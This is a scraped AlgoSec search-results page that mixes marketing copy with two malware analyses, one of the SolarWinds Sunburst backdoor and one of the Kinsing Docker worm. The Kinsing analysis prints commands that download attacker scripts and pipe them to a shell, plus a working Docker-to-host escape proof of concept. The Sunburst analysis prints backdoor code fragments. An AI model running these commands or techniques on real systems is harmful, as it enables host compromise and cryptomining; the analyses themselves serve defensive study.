top of page

Search results

615 results found with an empty search

  • AlgoSec | Sunburst Backdoor: A Deeper Look Into The SolarWinds’ Supply Chain Malware

    Update : Next two parts of the analysis are available here and here . As earlier reported by FireEye, the actors behind a global... Cloud Security Sunburst Backdoor: A Deeper Look Into The SolarWinds’ Supply Chain Malware Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 12/15/20 Published Update : Next two parts of the analysis are available here and here . As earlier reported by FireEye, the actors behind a global intrusion campaign have managed to trojanise SolarWinds Orion business software updates in order to distribute malware. The original FireEye write-up already provides a detailed description of this malware. Nevertheless, as the malicious update SolarWinds-Core-v2019.4.5220-Hotfix5.msp was still available for download for hours since the FireEye’s post, it makes sense to have another look into the details of its operation. The purpose of this write-up is to provide new information, not covered in the original write-up. Any overlaps with the original description provided by FireEye are not intentional. For start, the malicious component SolarWinds.Orion.Core.BusinessLayer.dll inside the MSP package is a non-obfuscated .NET assembly. It can easily be reconstructed with a .NET disassembler, such as ILSpy , and then fully reproduced in C# code, using Microsoft Visual Studio. Once reproduced, it can be debugged to better understand how it works. In a nutshell, the malicious DLL is a backdoor. It is loaded into the address space of the legitimate SolarWinds Orion process SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe . The critical strings inside the backdoor’s class SolarWinds.Orion.Core.BusinessLayer.OrionImprovementBusinessLayer are encoded with the DeflateStream Class of the .NET’s System.IO.Compression library, coupled with the standard base64 encoder. Initialisation Once loaded, the malware checks if its assembly file was created earlier than 12, 13, or 14 days ago. The exact number of hours it checks is a random number from 288 to 336. Next, it reads the application settings value ReportWatcherRetry . This value keeps the reporting status, and may be set to one of the states: New (4) Truncate (3) Append (5) When the malware runs the first time, its reporting status variable ReportWatcherRetry is set to New (4) . The reporting status is an internal state that drives the logic. For example, if the reporting status is set to Truncate , the malware will stop operating by first disabling its networking communications, and then disabling other security tools and antivirus products. In order to stay silent, the malware periodically falls asleep for a random period of time that varies between 30 minutes and 2 hours. At the start, the malware obtains the computer’s domain name . If the domain name is empty, the malware quits. It then generates a 8-byte User ID, which is derived from the system footprint. In particular, it is generated from MD5 hash of a string that consists from the 3 fields: the first or default operational (can transmit data packets) network interface’s physical address computer’s domain name UUID created by Windows during installation (machine’s unique ID) Even though it looks random, the User ID stays permanent as long as networking configuration and the Windows installation stay the same. Domain Generation Algorithm The malware relies on its own CryptoHelper class to generate a domain name. This class is instantiated from the 8-byte User ID and the computer’s domain name, encoded with a substitution table: “rq3gsalt6u1iyfzop572d49bnx8cvmkewhj” . For example, if the original domain name is “ domain “, its encoded form will look like: “ n2huov “. To generate a new domain, the malware first attempts to resolve domain name “ api.solarwinds.com “. If it fails to resolve it, it quits. The first part of the newly generated domain name is a random string, produced from the 8-byte User ID, a random seed value, and encoded with a custom base64 alphabet “ph2eifo3n5utg1j8d94qrvbmk0sal76c” . Because it is generated from a random seed value, the first part of the newly generated domain name is random. For example, it may look like “ fivu4vjamve5vfrt ” or “ k1sdhtslulgqoagy “. To produce the domain name, this string is then appended with the earlier encoded domain name (such as “ n2huov “) and a random string, selected from the following list: .appsync-api.eu-west-1[.]avsvmcloud[.]com .appsync-api.us-west-2[.]avsvmcloud[.]com .appsync-api.us-east-1[.]avsvmcloud[.]com .appsync-api.us-east-2[.]avsvmcloud[.]com For example, the final domain name may look like: fivu4vjamve5vfrtn2huov[.]appsync-api.us-west-2[.]avsvmcloud[.]com or k1sdhtslulgqoagyn2huov[.]appsync-api.us-east-1[.]avsvmcloud[.]com Next, the domain name is resolved to an IP address, or to a list of IP addresses. For example, it may resolve to 20.140.0.1 . The resolved domain name will be returned into IPAddress structure that will contain an AddressFamily field – a special field that specifies the addressing scheme. If the host name returned in the IPAddress structure is different to the queried domain name, the returned host name will be used as a C2 host name for the backdoor. Otherwise, the malware will check if the resolved IP address matches one of the patterns below, in order to return an ‘address family’: IP Address Subnet Mask ‘Address Family’ 10.0.0.0 255.0.0.0 Atm 172.16.0.0 255.240.0.0 Atm 192.168.0.0 255.255.0.0 Atm 224.0.0.0 240.0.0.0 Atm fc00:: fe00:: Atm fec0:: ffc0:: Atm ff00:: ff00:: Atm 41.84.159.0 255.255.255.0 Ipx 74.114.24.0 255.255.248.0 Ipx 154.118.140.0 255.255.255.0 Ipx 217.163.7.0 255.255.255.0 Ipx 20.140.0.0 255.254.0.0 ImpLink 96.31.172.0 255.255.255.0 ImpLink 131.228.12.0 255.255.252.0 ImpLink 144.86.226.0 255.255.255.0 ImpLink 8.18.144.0 255.255.254.0 NetBios 18.130.0.0 255.255.0.0 NetBios 71.152.53.0 255.255.255.0 NetBios 99.79.0.0 255.255.0.0 NetBios 87.238.80.0 255.255.248.0 NetBios 199.201.117.0 255.255.255.0 NetBios 184.72.0.0 255.254.0.0 NetBios For example, if the queried domain resolves to 20.140.0.1 , it will match the entry in the table 20.140.0.0 , for which the returned ‘address family’ will be ImpLink . The returned ‘address family’ invokes an additional logic in the malware. Disabling Security Tools and Antivirus Products If the returned ‘address family’ is ImpLink or Atm , the malware will enumerate all processes and for each process, it will check if its name matches one of the pre-defined hashes. Next, it repeats this processed for services and for the drivers installed in the system. If a process name or a full path of an installed driver matches one of the pre-defined hashes, the malware will disable it. For hashing, the malware relies on Fowler–Noll–Vo algorithm. For example, the core process of Windows Defender is MsMpEng.exe . The hash value of “ MsMpEng ” string is 5183687599225757871 . This value is specifically enlisted the malware’s source under a variable name timeStamps : timeStamps = new ulong[1] { 5183687599225757871uL } The service name of Windows Defender is windefend – the hash of this string ( 917638920165491138 ) is also present in the malware body. As a result, the malicioius DLL will attempt to stop the Windows Defender service. In order to disable various security tools and antivirus products, the malware first grants itself SeRestorePrivilege and SeTakeOwnershipPrivilege privileges, using the native AdjustTokenPrivileges() API. With these privileges enabled, the malware takes ownership of the service registry keys it intends to manipulate. The new owner of the keys is first attempted to be explicitly set to Administrator account. If such account is not present, the malware enumerates all user accounts, looking for a SID that represents the administrator account. The malware uses Windows Management Instrumentation query “ Select * From Win32_UserAccount ” to obtain the list of all users. For each enumerated user, it makes sure the account is local and then, when it obtains its SID, it makes sure the SID begins with S-1-5- and ends with -500 in order to locate the local administrator account. Once such account is found, it is used as a new owner for the registry keys, responsible for manipulation of the services of various security tools and antivirus products. With the new ownership set, the malware then disables these services by setting their Start value to 4 (Disabled): registryKey2.SetValue(“Start”), 4, RegistryValueKind.DWord); HTTP Backdoor If the returned ‘address family’ for the resolved domain name is NetBios , as specified in the lookup table above, the malware will initialise its HttpHelper class, which implements an HTTP backdoor. The backdoor commands are covered in the FireEye write-up, so let’s check only a couple of commands to see what output they produce. One of the backdoor commands is CollectSystemDescription . As its name suggests, it collects system information. By running the code reconstructed from the malware, here is an actual example of the data collected by the backdoor and delivered to the attacker’s C2 with a separate backdoor command UploadSystemDescription : 1. %DOMAIN_NAME% 2. S-1-5-21-298510922-2159258926-905146427 3. DESKTOP-VL39FPO 4. UserName 5. [E] Microsoft Windows NT 6.2.9200.0 6.2.9200.0 64 6. C:\WINDOWS\system32 7. 0 8. %PROXY_SERVER% Description: Killer Wireless-n/a/ac 1535 Wireless Network Adapter #2 MACAddress: 9C:B6:D0:F6:FF:5D DHCPEnabled: True DHCPServer: 192.168.20.1 DNSHostName: DESKTOP-VL39FPO DNSDomainSuffixSearchOrder: Home DNSServerSearchOrder: 8.8.8.8, 192.168.20.1 IPAddress: 192.168.20.30, fe80::8412:d7a8:57b9:5886 IPSubnet: 255.255.255.0, 64 DefaultIPGateway: 192.168.20.1, fe80::1af1:45ff:feec:a8eb NOTE: Field #7 specifies the number of days (0) since the last system reboot. GetProcessByDescription command will build a list of processes running on a system. This command accepts an optional argument, which is one of the custom process properties enlisted here . If the optional argument is not specified, the backdoor builds a process list that looks like: [ 1720] svchost [ 8184] chrome [ 4732] svchost If the optional argument is specified, the backdoor builds a process list that includes the specified process property in addition to parent process ID, username and domain for the process owner. For example, if the optional argument is specified as “ ExecutablePath “, the GetProcessByDescription command may return a list similar to: [ 3656] sihost.exe C:\WINDOWS\system32\sihost.exe 1720 DESKTOP-VL39FPO\UserName [ 3824] svchost.exe C:\WINDOWS\system32\svchost.exe 992 DESKTOP-VL39FPO\UserName [ 9428] chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 4600 DESKTOP-VL39FPO\UserName Other backdoor commands enable deployment of the 2nd stage malware. For example, the WriteFile command will save the file: using (FileStream fileStream = new FileStream(path, FileMode.Append, FileAccess.Write)) { fileStream.Write(array, 0, array.Length); } The downloaded 2nd stage malware can then the executed with RunTask command: using (Process process = new Process()) { process.StartInfo = new ProcessStartInfo(fileName, arguments) { CreateNoWindow = false, UseShellExecute = false }; if (process.Start()) … Alternatively, it can be configured to be executed with the system restart, using registry manipulation commands, such as SetRegistryValue . Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • Discovery | AlgoSec

    Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Discovery Streamlines Firewall Audits And Simplifies The Change Workflow Organization Discovery Industry Financial Services Headquarters Johannesberg, South Africa Download case study Share Customer
success stories "With AlgoSec we can now get, in a click of a button, what took two to three weeks per firewall to produce manually" Background Discovery Limited is a South African-founded financial services organization that operates in the healthcare, life assurance, short-term insurance, savings and investment products and wellness markets. Founded in 1992, Discovery was guided by a clear core purpose — to make people healthier and to enhance and protect their lives. Underpinning this core purpose is the belief that through innovation, Discovery can be a powerful market disruptor. The company, with headquarters in Johannesburg, South Africa, has expanded its operations globally and currently serves over 4.4 million clients across South Africa, the United Kingdom, the United States, China, Singapore and Australia.Operating in the highly regulated insurance and health sectors, Discovery monitors its compliance with international privacy laws and security criteria, includingPCI-DSS globally, Sarbanes-Oxley and HIPAA in the US, the Data Protection Act in the UK, and South Africa’s Protection of Personal Information Act. Challenge During its early years, the company managed its firewalls through an internally developed, legacy system which offered very limited visibility into the change request process.“We grew faster than anyone expected,” says Marc Silver, Security Manager at Discovery. “We needed better visibility into what changes were requested to which firewall, for what business need and also to ensure proper risk analysis.”Discovery’s growth necessitated a rapid increase in the number of firewalls deployed, and the corresponding ruleset sizes. The time required to audit them grew by orders of magnitude, ultimately taking up to three weeks per firewall. The IT Security team of four engineers recognized that it needed a fresh approach to manage risk and ensure compliance. Solution Discovery chose the AlgoSec Security Management Solution to deliver automated, comprehensive firewall operations, risk analysis and change management. Silver states that compared to AlgoSec’s competitors, “AlgoSec has a more tightly integrated change control, and is easier to manage. Another big advantage is how it finds unused rules and recommends rule consolidations,” says Silver.AlgoSec’s integration with Request Tracker (RT) change management system was also important in Discovery’s selection of a security management solution. “We use RT for our internal ticketing system, and the stability of AlgoSec’s integration with RT met our requirements. AlgoSec’s visual workflow is clear, easy to understand and more mature than the others we evaluated,” adds Silver. Results Since implementing AlgoSec, Discovery has found its security audits running more effectively. Discovery relies on AlgoSec’s built-in compliance reports to address Sarbanes-Oxley, HIPAA, PCI-DSS, and other national and international regulatory requirements. “Every year internal auditors would take our entire rulesets for each firewall pair and tell us where we needed to make improvements. AlgoSec now allows us to submit an automated report to our auditing team. It tells them what our security state is, and what needs to be remediated. The total process used to take three months. Now, in a click of a button, we can get what took two to three weeks per firewall to produce manually,” says Silver.Discovery has also found an unexpected advantage: “AlgoSec tells us what rules are in use and what rules are not. For one firewall, we were able to remove 30,000 rules. A firewall with 500,000 rules isn’t going to cope as well as one with 100,000 rules. By optimizing our devices, AlgoSec saves us money in the long term by enabling us to delay upgrading to a larger firewall,” adds Silver.In conclusion, Silver states that “Now we can see what is and isn’t happening in our security system. It has made a much bigger impact than we thought it would. With AlgoSec’s policy optimization, and the time we save on compliance, AlgoSec has given us a much stronger competitive edge than we had six months ago.” Schedule time with one of our experts

  • Securing & managing hybrid network security | AlgoSec

    Protect and manage hybrid network environments with effective security strategies, ensuring seamless integration, visibility, and compliance across diverse infrastructures. Securing & managing hybrid network security Overview Across cloud, SDN, on-premises and anything in between – one platform to manage it all. Making changes was easy with on-premises data centers. Your applications were secured behind lock and key, guarded by physical firewalls in easily-accessible locations. Today, your network doesn’t just live in one place. There are multiple public clouds and private clouds in addition to on-premises network devices. Security controls are a “black box” and your application connectivity crosses multiple borders. This complexity makes it difficult for organizations to securely accelerate application connectivity across their entire network. Schedule a Demo Main Challenges of Hybrid Cloud Security IT and Security staff find it difficult to maintain hybrid network security and deliver application connectivity due to: Lack of network and application visibility – Struggling with visibility into their network’s security policies and associated applications. Understanding the network structures and application flow paths is a challenge. Manual and siloed compliance process – The security audit process is manual. Documentation requirements are complex. Getting a complete view of the compliance status of the entire network is difficult. Audits are point-in-time but regulations require continuous compliance. Potential for network risks – Difficulty in identifying risky rules, such as unused, duplicate, overlapping, or expired rules, and understanding which applications may be impacted. Removing the wrong rule may lead to a data breach or outage. Complex manual change processes – Making changes to application connectivity is slow. Assessing the risk of changes is difficult, yet misconfigurations can cause outages and disrupt business. Changes involve teams speaking different languages with different objectives. Schedule a Demo Key Business Benefits Securely deliver applications faster. Enhance visibility across your entire hybrid network. Ensure changes adhere to internal and regulatory standards. Manage security posture and reduce configuration risks. Process network security policy changes in minutes not days. Avoid errors, rework, and application outages. Schedule a Demo AlgoSec Advantages Visibility into the applications on your network, so you can request changes at the application level. Unified view of the entire on-premises and multi-cloud estate from a single console. Manage multiple layers of security controls and proactively detect misconfigurations. Minimize the attack surface by identifying risks and helping to mitigate them. Match network policy risks to your applications to better understand the impact and prioritize remediation. Identify unused security rules so you have the confidence to remove them. Schedule a Demo Manage the Entire Hybrid Security Environment The AlgoSec platform helps organizations securely accelerate application delivery by automating application connectivity and security policy across the hybrid network estate, including public cloud, private cloud, containers, and on-premises networks. Enable application visibility — Get a full network map of your entire hybrid network security estate. Ensure application discovery across your entire estate and identify your application dependencies. Manage next-generation security policies and cloud security groups alongside traditional firewalls. Get instant visibility of your cloud assets and security controls. Pinpoint and troubleshoot network connectivity issues. Mitigate risks and detect misconfigurations – Easily identify risky security policy rules, the assets and applications they expose, and whether they are in use. Proactively detect misconfigurations to protect cloud assets, including cloud instances, databases, and serverless functions. Achieve continuous compliance – On-going monitoring of multi-cloud and hybrid cloud network-security configuration changes to avoid compliance violations. Identify which applications introduce compliance risk. Automated and audit-ready compliance reports for major global regulations and internal standards. Automate changes intelligently – Cut application delivery bottlenecks with intelligent application change automation. Using zero-touch automation, security policies can be automated from implementation all the way through validating that the changes work exactly as intended. Migrate applications easily – Simplify the complex process of migrating business applications by automatically discovering, mapping, and migrating connectivity configurations with firewalls and security groups. Identify flows serving your applications and track them to security policy. This makes it possible to enable network provisioning as part of your cloud migration. Schedule a Demo About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to securely accelerate application delivery by automating application connectivity and security policy, anywhere. The AlgoSec platform enables the world’s most complex organizations to gain visibility, reduce risk, and process changes at zero-touch across the hybrid network. Over 1,800 of the world’s leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks, while taking advantage of almost two decades of leadership in Network Security Policy Management. See what securely accelerating your digital transformation, move-to-cloud, infrastructure modernization, or micro-segmentation initiatives looks like at www.algosec.com . Let's start your journey to our business-centric network security. Schedule a Demo Select a size Overview Main Challenges of Hybrid Cloud Security Key Business Benefits AlgoSec Advantages Manage the Entire Hybrid Security Environment About AlgoSec Get the latest insights from the experts Choose a better way to manage your network

  • Palo Alto and AlgoSec Joint Solution Brief - AlgoSec

    Palo Alto and AlgoSec Joint Solution Brief Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • Driving Security Through Observability: Transforming Application Risk into Resilience - AlgoSec

    Driving Security Through Observability: Transforming Application Risk into Resilience WhitePaper Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec Values - AlgoSec

    AlgoSec Values Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • Cloud migrations made simpler: Safe, Secure and Successful Migrations | AlgoSec

    Webinars Cloud migrations made simpler: Safe, Secure and Successful Migrations Migrating applications to the cloud – without creating security holes, application outages or violating compliance – is within reach! In this webinar, Avivi Siman-Tov, Director of Product at AlgoSec, will guide you how to simplify and accelerate large-scale complex application migration projects. The webinar will cover: Why organizations choose to migrate their applications to the cloud What is required in order to move the security portion of your application and how long it may take Challenges and solutions to lower the cost, better prepare for the migration and reduce the risks involved How to deliver unified security policy management across the hybrid cloud environment October 28, 2020 Avivi Siman Tov Director of Product Relevant resources Cloud atlas: how to accelerate application migrations to the cloud Keep Reading A 3 Layered Approach to Application Migration Download (Multiligual) Migrating Application Connectivity to the Cloud Keep Reading CouchTalk: Software Defined Networks (SDN) – Migration, Security and Management Watch Video Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • Zero trust container analysis system - AlgoSec

    Zero trust container analysis system Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers

    We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Convergence didn’t fail, compliance did.

    Convergence has been claimed. Security orgs merged their teams, aligned their titles, and drew the new boxes on the whiteboard. The... Convergence didn’t fail, compliance did. Adel Osta Dadan 2 min read Adel Osta Dadan Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 6/17/25 Published Convergence has been claimed. Security orgs merged their teams, aligned their titles, and drew the new boxes on the whiteboard. The result: security teams are now responsible for both cloud and on-premises network environments. But for many of those teams, compliance is still running on fumes. The reporting lines changed. The responsibilities increased. The oversight? Still patchy. The systems? Still fragmented. And the ability to demonstrate consistent policy enforcement across hybrid environments—where compliance lives or dies—has never been more at risk. This isn’t an edge case. It’s structural. And it’s quietly putting every converged team in a bind. The illusion of control If convergence was supposed to simplify compliance, most teams missed the memo. Cloud-native controls don’t sync with on-prem rule sets. Application deployments move faster than the audits tracking them. Policies drift. Risk assessments stall out. And when the next audit comes knocking, security teams are left reconciling evidence after the fact—manually stitching together logs, policies, and screenshots across tools that don’t talk to each other. The result? Ownership without visibility. Policy without context. Responsibility without control. Compliance at the application layer—or nowhere Security and compliance are often treated as parallel tracks. But in hybrid environments, they’re the same problem. The more distributed your network, the more fragmented your enforcement—and the harder it becomes to map controls to real business risk. What matters isn’t whether a port is open. It’s whether the application behind it should be reachable from that region, that VPC, or that user. That requires context. And today, context lives at the application layer. This is where AlgoSec Horizon changes the equation. AlgoSec Horizon is the first platform built to secure application connectivity across hybrid networks—with compliance embedded by design. Horizon: compliance that knows what it’s looking at With Horizon, compliance isn’t an add-on. It’s the outcome of deep visibility and policy awareness at the level that actually matters: the business application. Our customers are using Horizon to: Automatically discover and map every business application—including shadow IT and unapproved flows Simulate rule changes in advance, avoiding deployment errors that compromise compliance Track and enforce policies in context, with real-time validation against compliance frameworks Generate audit-ready reports across hybrid networks without assembling data by hand It’s compliance without the swivel chair. And it’s already helping converged teams move faster—without giving up control. Compliance can’t be an after-thought. Security convergence wasn’t the mistake. Stopping at structure was. When compliance is left behind, the risk isn’t just audit failure—it’s operational drag. Policy friction. Delays in application delivery. Missed SLAs. Because the real impact of compliance gaps isn’t found in the SOC—it’s found in the business outcomes that stall because security couldn’t keep pace. Horizon closes that gap. Because in a world of converged teams and hybrid environments, security has to operate with complete visibility—and compliance has to work at the speed of the application. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Top 9 Network Security Monitoring Tools for Identifying Potential Threats

    What is Network Security Monitoring? Network security monitoring is the process of inspecting network traffic and IT infrastructure for... Network Security Top 9 Network Security Monitoring Tools for Identifying Potential Threats Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 2/4/24 Published What is Network Security Monitoring? Network security monitoring is the process of inspecting network traffic and IT infrastructure for signs of security issues. These signs can provide IT teams with valuable information about the organization’s cybersecurity posture. For example, security teams may notice unusual changes being made to access control policies. This may lead to unexpected traffic flows between on-premises systems and unrecognized web applications. This might provide early warning of an active cyberattack, giving security teams enough time to conduct remediation efforts and prevent data loss . Detecting this kind of suspicious activity without the visibility that network security monitoring provides would be very difficult. These tools and policies enhance operational security by enabling network intrusion detection, anomaly detection, and signature-based detection. Full-featured network security monitoring solutions help organizations meet 